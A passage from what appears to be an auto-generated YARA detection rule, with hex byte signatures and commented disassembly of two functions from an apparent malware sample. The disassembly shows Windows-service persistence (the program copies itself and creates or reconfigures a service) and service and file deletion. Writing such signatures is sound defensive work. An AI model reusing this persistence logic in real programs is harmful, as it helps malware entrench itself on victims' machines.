85 ?? ?? ?? ?? 02 00 8B 85 ?? ?? ?? ?? 8B 48 ?? 8B 11 8B 02 89 85 ?? ?? ?? ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 6A 10 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 8B 08 51 FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? 8B 55 ?? 8B 02 50 FF 15 ?? ?? ?? ?? 8B 4D ?? C7 01 FF FF FF FF FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 33 C0 8B E5 5D C3 } + /* +function at 0x00402600@b94af4a4d4af6eac81fc135abda1c40c with 5 features: + - copy file + - create service + - modify service + - persist via Windows service + - query environment variable + .text:0x00402600 + .text:0x00402600 FUNC: int thiscall_caller sub_00402600( void * ecx, int arg1, ) [4 XREFS] + .text:0x00402600 + .text:0x00402600 Stack Variables: (offset from initial top of stack) + .text:0x00402600 4: int arg1 + .text:0x00402600 -1028: int local1028 + .text:0x00402600 -1032: int local1032 + .text:0x00402600 -2056: int local2056 + .text:0x00402600 -3080: int local3080 + .text:0x00402600 -4104: int local4104 + .text:0x00402600 -5128: int local5128 + .text:0x00402600 -5132: int local5132 + .text:0x00402600 + .text:0x00402600 55 push ebp + .text:0x00402601 8bec mov ebp,esp + .text:0x00402603 b808140000 mov eax,0x00001408 + .text:0x00402608 e8a3080000 call 0x00402eb0 ;__alloca_probe() + .text:0x0040260d 53 push ebx + .text:0x0040260e 56 push esi + .text:0x0040260f 57 push edi + .text:0x00402610 6800040000 push 1024 + .text:0x00402615 8d85fcebffff lea eax,dword [ebp - 5124] + .text:0x0040261b 50 push eax + .text:0x0040261c e88fffffff call 0x004025b0 ;sub_004025b0(local5128) + .text:0x00402621 83c408 add esp,8 + .text:0x00402624 85c0 test eax,eax + .text:0x00402626 740a jz 0x00402632 + .text:0x00402628 b801000000 mov eax,1 + .text:0x0040262d e9c3020000 jmp 0x004028f5 + .text:0x00402632 loc_00402632: [1 XREFS] + .text:0x00402632 bf34c14000 mov edi,0x0040c134 + .text:0x00402637 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040263d 83c9ff or ecx,0xffffffff + .text:0x00402640 33c0 xor eax,eax + .text:0x00402642 f2ae repnz: scasb + .text:0x00402644 f7d1 not ecx + .text:0x00402646 2bf9 sub edi,ecx + .text:0x00402648 8bf7 mov esi,edi + .text:0x0040264a 8bc1 mov eax,ecx + .text:0x0040264c 8bfa mov edi,edx + .text:0x0040264e c1e902 shr ecx,2 + .text:0x00402651 f3a5 rep: movsd + .text:0x00402653 8bc8 mov ecx,eax + .text:0x00402655 83e103 and ecx,3 + .text:0x00402658 f3a4 rep: movsb + .text:0x0040265a 8dbdfcebffff lea edi,dword [ebp - 5124] + .text:0x00402660 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402666 83c9ff or ecx,0xffffffff + .text:0x00402669 33c0 xor eax,eax + .text:0x0040266b f2ae repnz: scasb + .text:0x0040266d f7d1 not ecx + .text:0x0040266f 2bf9 sub edi,ecx + .text:0x00402671 8bf7 mov esi,edi + .text:0x00402673 8bd9 mov ebx,ecx + .text:0x00402675 8bfa mov edi,edx + .text:0x00402677 83c9ff or ecx,0xffffffff + .text:0x0040267a 33c0 xor eax,eax + .text:0x0040267c f2ae repnz: scasb + .text:0x0040267e 83c7ff add edi,0xffffffff + .text:0x00402681 8bcb mov ecx,ebx + .text:0x00402683 c1e902 shr ecx,2 + .text:0x00402686 f3a5 rep: movsd + .text:0x00402688 8bcb mov ecx,ebx + .text:0x0040268a 83e103 and ecx,3 + .text:0x0040268d f3a4 rep: movsb + .text:0x0040268f bf2cc14000 mov edi,0x0040c12c + .text:0x00402694 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040269a 83c9ff or ecx,0xffffffff + .text:0x0040269d 33c0 xor eax,eax + .text:0x0040269f f2ae repnz: scasb + .text:0x004026a1 f7d1 not ecx + .text:0x004026a3 2bf9 sub edi,ecx + .text:0x004026a5 8bf7 mov esi,edi + .text:0x004026a7 8bd9 mov ebx,ecx + .text:0x004026a9 8bfa mov edi,edx + .text:0x004026ab 83c9ff or ecx,0xffffffff + .text:0x004026ae 33c0 xor eax,eax + .text:0x004026b0 f2ae repnz: scasb + .text:0x004026b2 83c7ff add edi,0xffffffff + .text:0x004026b5 8bcb mov ecx,ebx + .text:0x004026b7 c1e902 shr ecx,2 + .text:0x004026ba f3a5 rep: movsd + .text:0x004026bc 8bcb mov ecx,ebx + .text:0x004026be 83e103 and ecx,3 + .text:0x004026c1 f3a4 rep: movsb + .text:0x004026c3 683f000f00 push 0x000f003f + .text:0x004026c8 6a00 push 0 + .text:0x004026ca 6a00 push 0 + .text:0x004026cc ff1500b04000 call dword [0x0040b000] ;advapi32.OpenSCManagerA(0,0,0x000f003f) + .text:0x004026d2 8985fcfbffff mov dword [ebp - 1028],eax + .text:0x004026d8 83bdfcfbffff00 cmp dword [ebp - 1028],0 + .text:0x004026df 750a jnz 0x004026eb + .text:0x004026e1 b801000000 mov eax,1 + .text:0x004026e6 e90a020000 jmp 0x004028f5 + .text:0x004026eb loc_004026eb: [1 XREFS] + .text:0x004026eb 68ff010f00 push 0x000f01ff + .text:0x004026f0 8b4508 mov eax,dword [ebp + 8] + .text:0x004026f3 50 push eax + .text:0x004026f4 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x004026fa 51 push ecx + .text:0x004026fb ff1504b04000 call dword [0x0040b004] ;advapi32.OpenServiceA(advapi32.OpenSCManagerA(0,0,0x000f003f),arg1,0x000f01ff) + .text:0x00402701 8985f8ebffff mov dword [ebp - 5128],eax + .text:0x00402707 83bdf8ebffff00 cmp dword [ebp - 5128],0 + .text:0x0040270e 746d jz 0x0040277d + .text:0x00402710 6a00 push 0 + .text:0x00402712 6a00 push 0 + .text:0x00402714 6a00 push 0 + .text:0x00402716 6a00 push 0 + .text:0x00402718 6a00 push 0 + .text:0x0040271a 6a00 push 0 + .text:0x0040271c 8d95fcf7ffff lea edx,dword [ebp - 2052] + .text:0x00402722 52 push edx + .text:0x00402723 6aff push 0xffffffff + .text:0x00402725 6a02 push 2 + .text:0x00402727 6aff push 0xffffffff + .text:0x00402729 8b85f8ebffff mov eax,dword [ebp - 5128] + .text:0x0040272f 50 push eax + .text:0x00402730 ff1508b04000 call dword [0x0040b008] ;advapi32.ChangeServiceConfigA(advapi32.OpenServiceA(<0x004026cc>,arg1,0x000f01ff),0xffffffff,2,0xffffffff,local2056,0,0,0,0,0,0) + .text:0x00402736 85c0 test eax,eax + .text:0x00402738 7524 jnz 0x0040275e + .text:0x0040273a 8b8df8ebffff mov ecx,dword [ebp - 5128] + .text:0x00402740 51 push ecx + .text:0x00402741 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026fb>) + .text:0x00402747 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x0040274d 52 push edx + .text:0x0040274e ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026cc>) + .text:0x00402754 b801000000 mov eax,1 + .text:0x00402759 e997010000 jmp 0x004028f5 + .text:0x0040275e loc_0040275e: [1 XREFS] + .text:0x0040275e 8b85f8ebffff mov eax,dword [ebp - 5128] + .text:0x00402764 50 push eax + .text:0x00402765 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026fb>) + .text:0x0040276b 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x00402771 51 push ecx + .text:0x00402772 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026cc>) + .text:0x00402778 e9ce000000 jmp 0x0040284b + .text:0x0040277d loc_0040277d: [1 XREFS] + .text:0x0040277d 8b7d08 mov edi,dword [ebp + 8] + .text:0x00402780 8d95fcf3ffff lea edx,dword [ebp - 3076] + .text:0x00402786 83c9ff or ecx,0xffffffff + .text:0x00402789 33c0 xor eax,eax + .text:0x0040278b f2ae repnz: scasb + .text:0x0040278d f7d1 not ecx + .text:0x0040278f 2bf9 sub edi,ecx + .text:0x00402791 8bf7 mov esi,edi + .text:0x00402793 8bc1 mov eax,ecx + .text:0x00402795 8bfa mov edi,edx + .text:0x00402797 c1e902 shr ecx,2 + .text:0x0040279a f3a5 rep: movsd + .text:0x0040279c 8bc8 mov ecx,eax + .text:0x0040279e 83e103 and ecx,3 + .text:0x004027a1 f3a4 rep: movsb + .text:0x004027a3 bf18c14000 mov edi,0x0040c118 + .text:0x004027a8 8d95fcf3ffff lea edx,dword [ebp - 3076] + .text:0x004027ae 83c9ff or ecx,0xffffffff + .text:0x004027b1 33c0 xor eax,eax + .text:0x004027b3 f2ae repnz: scasb + .text:0x004027b5 f7d1 not ecx + .text:0x004027b7 2bf9 sub edi,ecx + .text:0x004027b9 8bf7 mov esi,edi + .text:0x004027bb 8bd9 mov ebx,ecx + .text:0x004027bd 8bfa mov edi,edx + .text:0x004027bf 83c9ff or ecx,0xffffffff + .text:0x004027c2 33c0 xor eax,eax + .text:0x004027c4 f2ae repnz: scasb + .text:0x004027c6 83c7ff add edi,0xffffffff + .text:0x004027c9 8bcb mov ecx,ebx + .text:0x004027cb c1e902 shr ecx,2 + .text:0x004027ce f3a5 rep: movsd + .text:0x004027d0 8bcb mov ecx,ebx + .text:0x004027d2 83e103 and ecx,3 + .text:0x004027d5 f3a4 rep: movsb + .text:0x004027d7 6a00 push 0 + .text:0x004027d9 6a00 push 0 + .text:0x004027db 6a00 push 0 + .text:0x004027dd 6a00 push 0 + .text:0x004027df 6a00 push 0 + .text:0x004027e1 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x004027e7 50 push eax + .text:0x004027e8 6a01 push 1 + .text:0x004027ea 6a02 push 2 + .text:0x004027ec 6a20 push 32 + .text:0x004027ee 68ff010f00 push 0x000f01ff + .text:0x004027f3 8d8dfcf3ffff lea ecx,dword [ebp - 3076] + .text:0x004027f9 51 push ecx + .text:0x004027fa 8b5508 mov edx,dword [ebp + 8] + .text:0x004027fd 52 push edx + .text:0x004027fe 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x00402804 50 push eax + .text:0x00402805 ff1510b04000 call dword [0x0040b010] ;advapi32.CreateServiceA(<0x004026cc>,arg1,local3080,0x000f01ff,32,2,1,local1028,0,0,0,0,0) + .text:0x0040280b 8985f8ebffff mov dword [ebp - 5128],eax + .text:0x00402811 83bdf8ebffff00 cmp dword [ebp - 5128],0 + .text:0x00402818 7517 jnz 0x00402831 + .text:0x0040281a 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x00402820 51 push ecx + .text:0x00402821 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026cc>) + .text:0x00402827 b801000000 mov eax,1 + .text:0x0040282c e9c4000000 jmp 0x004028f5 + .text:0x00402831 loc_00402831: [1 XREFS] + .text:0x00402831 8b95f8ebffff mov edx,dword [ebp - 5128] + .text:0x00402837 52 push edx + .text:0x00402838 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(advapi32.CreateServiceA(<0x004026cc>,arg1,local3080,0x000f01ff,32,2,1,local1028,0,0,0,0,0)) + .text:0x0040283e 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x00402844 50 push eax + .text:0x00402845 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004026cc>) + .text:0x0040284b loc_0040284b: [1 XREFS] + .text:0x0040284b 6800040000 push 1024 + .text:0x00402850 8d8dfcf7ffff lea ecx,dword [ebp - 2052] + .text:0x00402856 51 push ecx + .text:0x00402857 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040285d 52 push edx + .text:0x0040285e ff1530b04000 call dword [0x0040b030] ;kernel32.ExpandEnvironmentStringsA(local1028,local2056,1024) + .text:0x00402864 85c0 test eax,eax + .text:0x00402866 750a jnz 0x00402872 + .text:0x00402868 b801000000 mov eax,1 + .text:0x0040286d e983000000 jmp 0x004028f5 + .text:0x00402872 loc_00402872: [1 XREFS] + .text:0x00402872 6800040000 push 1024 + .text:0x00402877 8d85fcefffff lea eax,dword [ebp - 4100] + .text:0x0040287d 50 push eax + .text:0x0040287e 6a00 push 0 + .text:0x00402880 ff1538b04000 call dword [0x0040b038] ;kernel32.GetModuleFileNameA(0,local4104,1024) + .text:0x00402886 85c0 test eax,eax + .text:0x00402888 7507 jnz 0x00402891 + .text:0x0040288a b801000000 mov eax,1 + .text:0x0040288f eb64 jmp 0x004028f5 + .text:0x00402891 loc_00402891: [1 XREFS] + .text:0x00402891 6a00 push 0 + .text:0x00402893 8d8dfcf7ffff lea ecx,dword [ebp - 2052] + .text:0x00402899 51 push ecx + .text:0x0040289a 8d95fcefffff lea edx,dword [ebp - 4100] + .text:0x004028a0 52 push edx + .text:0x004028a1 ff1534b04000 call dword [0x0040b034] ;kernel32.CopyFileA(local4104,local2056,0) + .text:0x004028a7 85c0 test eax,eax + .text:0x004028a9 7507 jnz 0x004028b2 + .text:0x004028ab b801000000 mov eax,1 + .text:0x004028b0 eb43 jmp 0x004028f5 + .text:0x004028b2 loc_004028b2: [1 XREFS] + .text:0x004028b2 8d85fcf7ffff lea eax,dword [ebp - 2052] + .text:0x004028b8 50 push eax + .text:0x004028b9 e8f2ecffff call 0x004015b0 ;sub_004015b0(local2056,local2056) + .text:0x004028be 83c404 add esp,4 + .text:0x004028c1 85c0 test eax,eax + .text:0x004028c3 7407 jz 0x004028cc + .text:0x004028c5 b801000000 mov eax,1 + .text:0x004028ca eb29 jmp 0x004028f5 + .text:0x004028cc loc_004028cc: [1 XREFS] + .text:0x004028cc 6814c14000 push 0x0040c114 + .text:0x004028d1 6810c14000 push 0x0040c110 + .text:0x004028d6 68e8c04000 push 0x0040c0e8 + .text:0x004028db 68e4c04000 push 0x0040c0e4 + .text:0x004028e0 e88be7ffff call 0x00401070 ;sub_00401070(0x0040c0e4,0x0040c0e8,0x0040c110,0x0040c114) + .text:0x004028e5 83c410 add esp,16 + .text:0x004028e8 85c0 test eax,eax + .text:0x004028ea 7407 jz 0x004028f3 + .text:0x004028ec b801000000 mov eax,1 + .text:0x004028f1 eb02 jmp 0x004028f5 + .text:0x004028f3 loc_004028f3: [1 XREFS] + .text:0x004028f3 33c0 xor eax,eax + .text:0x004028f5 loc_004028f5: [9 XREFS] + .text:0x004028f5 5f pop edi + .text:0x004028f6 5e pop esi + .text:0x004028f7 5b pop ebx + .text:0x004028f8 8be5 mov esp,ebp + .text:0x004028fa 5d pop ebp + .text:0x004028fb c3 ret + */ + $c53 = { 55 8B EC B8 08 14 00 00 E8 ?? ?? ?? ?? 53 56 57 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 34 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 2C C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 FF 01 0F 00 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 8D 95 ?? ?? ?? ?? 52 6A FF 6A 02 6A FF 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7D ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 BF 18 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 6A 00 6A 00 6A 00 6A 00 8D 85 ?? ?? ?? ?? 50 6A 01 6A 02 6A 20 68 FF 01 0F 00 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 6A 00 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 6A 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 14 C1 40 00 68 10 C1 40 00 68 E8 C0 40 00 68 E4 C0 40 00 E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00402900@b94af4a4d4af6eac81fc135abda1c40c with 3 features: + - delete file + - delete service + - query environment variable + .text:0x00402900 + .text:0x00402900 FUNC: int cdecl sub_00402900( int arg0, ) [4 XREFS] + .text:0x00402900 + .text:0x00402900 Stack Variables: (offset from initial top of stack) + .text:0x00402900 4: int arg0 + .text:0x00402900 -1028: int local1028 + .text:0x00402900 -1032: int local1032 + .text:0x00402900 -2056: int local2056 + .text:0x00402900 -3080: int local3080 + .text:0x00402900 -3084: int local3084 + .text:0x00402900 + .text:0x00402900 55 push ebp + .text:0x00402901 8bec mov ebp,esp + .text:0x00402903 81ec080c0000 sub esp,3080 + .text:0x00402909 53 push ebx + .text:0x0040290a 56 push esi + .text:0x0040290b 57 push edi + .text:0x0040290c 683f000f00 push 0x000f003f + .text:0x00402911 6a00 push 0 + .text:0x00402913 6a00 push 0 + .text:0x00402915 ff1500b04000 call dword [0x0040b000] ;advapi32.OpenSCManagerA(0,0,0x000f003f) + .text:0x0040291b 8985fcfbffff mov dword [ebp - 1028],eax + .text:0x00402921 83bdfcfbffff00 cmp dword [ebp - 1028],0 + .text:0x00402928 750a jnz 0x00402934 + .text:0x0040292a b801000000 mov eax,1 + .text:0x0040292f e9b3010000 jmp 0x00402ae7 + .text:0x00402934 loc_00402934: [1 XREFS] + .text:0x00402934 68ff010f00 push 0x000f01ff + .text:0x00402939 8b4508 mov eax,dword [ebp + 8] + .text:0x0040293c 50 push eax + .text:0x0040293d 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x00402943 51 push ecx + .text:0x00402944 ff1504b04000 call dword [0x0040b004] ;advapi32.OpenServiceA(advapi32.OpenSCManagerA(0,0,0x000f003f),arg0,0x000f01ff) + .text:0x0040294a 8985f8f3ffff mov dword [ebp - 3080],eax + .text:0x00402950 83bdf8f3ffff00 cmp dword [ebp - 3080],0 + .text:0x00402957 7517 jnz 0x00402970 + .text:0x00402959 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x0040295f 52 push edx + .text:0x00402960 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00402915>) + .text:0x00402966 b801000000 mov eax,1 + .text:0x0040296b e977010000 jmp 0x00402ae7 + .text:0x00402970 loc_00402970: [1 XREFS] + .text:0x00402970 8b85f8f3ffff mov eax,dword [ebp - 3080] + .text:0x00402976 50 push eax + .text:0x00402977 ff1528b04000 call dword [0x0040b028] ;advapi32.DeleteService(advapi32.OpenServiceA(<0x00402915>,arg0,0x000f01ff)) + .text:0x0040297d 85c0 test eax,eax + .text:0x0040297f 7524 jnz 0x004029a5 + .text:0x00402981 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x00402987 51 push ecx + .text:0x00402988 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00402915>) + .text:0x0040298e 8b95f8f3ffff mov edx,dword [ebp - 3080] + .text:0x00402994 52 push edx + .text:0x00402995 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00402944>) + .text:0x0040299b b801000000 mov eax,1 + .text:0x004029a0 e942010000 jmp 0x00402ae7 + .text:0x004029a5 loc_004029a5: [1 XREFS] + .text:0x004029a5 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x004029ab 50 push eax + .text:0x004029ac ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00402915>) + .text:0x004029b2 8b8df8f3ffff mov ecx,dword [ebp - 3080] + .text:0x004029b8 51 push ecx + .text:0x004029b9 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00402944>) + .text:0x004029bf 6800040000 push 1024 + .text:0x004029c4 8d95fcf3ffff lea edx,dword [ebp - 3076] + .text:0x004029ca 52 push edx + .text:0x004029cb e8e0fbffff call 0x004025b0 ;sub_004025b0(local3080) + .text:0x004029d0 83c408 add esp,8 + .text:0x004029d3 85c0 test eax,eax + .text:0x004029d5 740a jz 0x004029e1 + .text:0x004029d7 b801000000 mov eax,1 + .text:0x004029dc e906010000 jmp 0x00402ae7 + .text:0x004029e1 loc_004029e1: [1 XREFS] + .text:0x004029e1 bf34c14000 mov edi,0x0040c134 + .text:0x004029e6 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x004029ec 83c9ff or ecx,0xffffffff + .text:0x004029ef 33c0 xor eax,eax + .text:0x004029f1 f2ae repnz: scasb + .text:0x004029f3 f7d1 not ecx + .text:0x004029f5 2bf9 sub edi,ecx + .text:0x004029f7 8bf7 mov esi,edi + .text:0x004029f9 8bc1 mov eax,ecx + .text:0x004029fb 8bfa mov edi,edx + .text:0x004029fd c1e902 shr ecx,2 + .text:0x00402a00 f3a5 rep: movsd + .text:0x00402a02 8bc8 mov ecx,eax + .text:0x00402a04 83e103 and ecx,3 + .text:0x00402a07 f3a4 rep: movsb + .text:0x00402a09 8dbdfcf3ffff lea edi,dword [ebp - 3076] + .text:0x00402a0f 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402a15 83c9ff or ecx,0xffffffff + .text:0x00402a18 33c0 xor eax,eax + .text:0x00402a1a f2ae repnz: scasb + .text:0x00402a1c f7d1 not ecx + .text:0x00402a1e 2bf9 sub edi,ecx + .text:0x00402a20 8bf7 mov esi,edi + .text:0x00402a22 8bd9 mov ebx,ecx + .text:0x00402a24 8bfa mov edi,edx + .text:0x00402a26 83c9ff or ecx,0xffffffff + .text:0x00402a29 33c0 xor eax,eax + .text:0x00402a2b f2ae repnz: scasb + .text:0x00402a2d 83c7ff add edi,0xffffffff + .text:0x00402a30 8bcb mov ecx,ebx + .text:0x00402a32 c1e902 shr ecx,2 + .text:0x00402a35 f3a5 rep: movsd + .text:0x00402a37 8bcb mov ecx,ebx + .text:0x00402a39 83e103 and ecx,3 + .text:0x00402a3c f3a4 rep: movsb + .text:0x00402a3e bf2cc14000 mov edi,0x0040c12c + .text:0x00402a43 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00402a49 83c9ff or ecx,0xffffffff + .text:0x00402a4c 33c0 xor eax,eax + .text:0x00402a4e f2ae repnz: scasb + .text:0x00402a50 f7d1 not ecx + .text:0x00402a52 2bf9 sub edi,ecx + .text:0x00402a54 8bf7 mov esi,edi + .text:0x00402a56 8bd9 mov ebx,ecx + .text:0x00402a58 8bfa mov edi,edx + .text:0x00402a5a 83c9ff or ecx,0xffffffff + .text:0x00402a5d 33c0 xor eax,eax + .text:0x00402a5f f2ae repnz: scasb + .text:0x00402a61 83c7ff add edi,0xffffffff + .text:0x00402a64 8bcb mov ecx,ebx + .text:0x00402a66 c1e902 shr ecx,2 + .text:0x00402a69 f3a5 rep: movsd + .text:0x00402a6b 8bcb mov ecx,ebx + .text:0x00402a6d 83e103 and ecx,3 + .text:0x00402a70 f3a4 rep: movsb + .text:0x00402a72 6800040000 push 1024 + .text:0x00402a77 8d85fcf7ffff lea eax,dword [ebp - 2052] + .text:0x00402a7d 50 push eax + .text:0x00402a7e 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00402a84 51 push ecx + .text:0x00402a85 ff1530b04000 call dword [0x0040b030] ;kernel32.ExpandEnvironmentStringsA(local1028,local2056,1024) + .text:0x00402a8b 85c0 test eax,eax + .text:0x00402a8d 7507 jnz 0x00402a96 + .text:0x00402a8f b801000000 mov eax,1 + .text:0x00402a94 eb51 jmp 0x00402ae7 + .text:0x00402a96 loc_00402a96: [1 XREFS] + .text:0x00402a96 8d95fcf7ffff lea edx,dword [ebp - 2052] + .text:0x00402a9c 52 push edx + .text:0x00402a9d ff1560b04000 call dword [0x0040b060] ;kernel32.DeleteFileA(local2056) + .text:0x00402aa3 85c0 test eax,eax + .text:0x00402aa5 7507 jnz 0x00402aae + .text:0x00402aa7 b801000000 mov eax,1 + .text:0x00402aac eb39 jmp 0x00402ae7 + .text:0x00402aae loc_00402aae: [1 XREFS] + .text:0x00402aae 6860eb4000 push 0x0040eb60 + .text:0x00402ab3 6860eb4000 push 0x0040eb60 + .text:0x00402ab8 6860eb4000 push 0x0040eb60 + .text:0x00402abd 6860eb4000 push 0x0040eb60 + .text:0x00402ac2 e8a9e5ffff call 0x00401070 ;sub_00401070(0x0040eb60,0x0040eb60,0x0040eb60,0x0040eb60) + .text:0x00402ac7 83c410 add esp,16 + .text:0x00402aca 85c0 test eax,eax + .text:0x00402acc 7407 jz 0x00402ad5 + .text:0x00402ace b801000000 mov eax,1 + .text:0x00402ad3 eb12 jmp 0x00402ae7 + .text:0x00402ad5 loc_00402ad5: [1 XREFS] + .text:0x00402ad5 e836e7ffff call 0x00401210 ;sub_00401210() + .text:0x00402ada 85c0 test eax,eax + .text:0x00402adc 7407 jz 0x00402ae5 + .text:0x00402ade b801000000 mov eax,1 + .text:0x00402ae3 eb02 jmp 0x00402ae7 + .text:0x00402ae5 loc_00402ae5: [1 XREFS] + .text:0x00402ae5 33c0 xor eax,eax + .text:0x00402ae7 loc_00402ae7: [8 XREFS] + .text:0x00402ae7 5f pop edi + .text:0x00402ae8 5e pop esi + .text:0x00402ae9 5b pop ebx + .text:0x00402aea 8be5 mov esp,ebp + .text:0x00402aec 5d pop ebp + .text:0x00402aed c3 ret + */ + $c54 = { 55 8B EC 81 EC 08 0C 00 00 53 56 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 FF 01 0F 00 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 34 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 2C C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 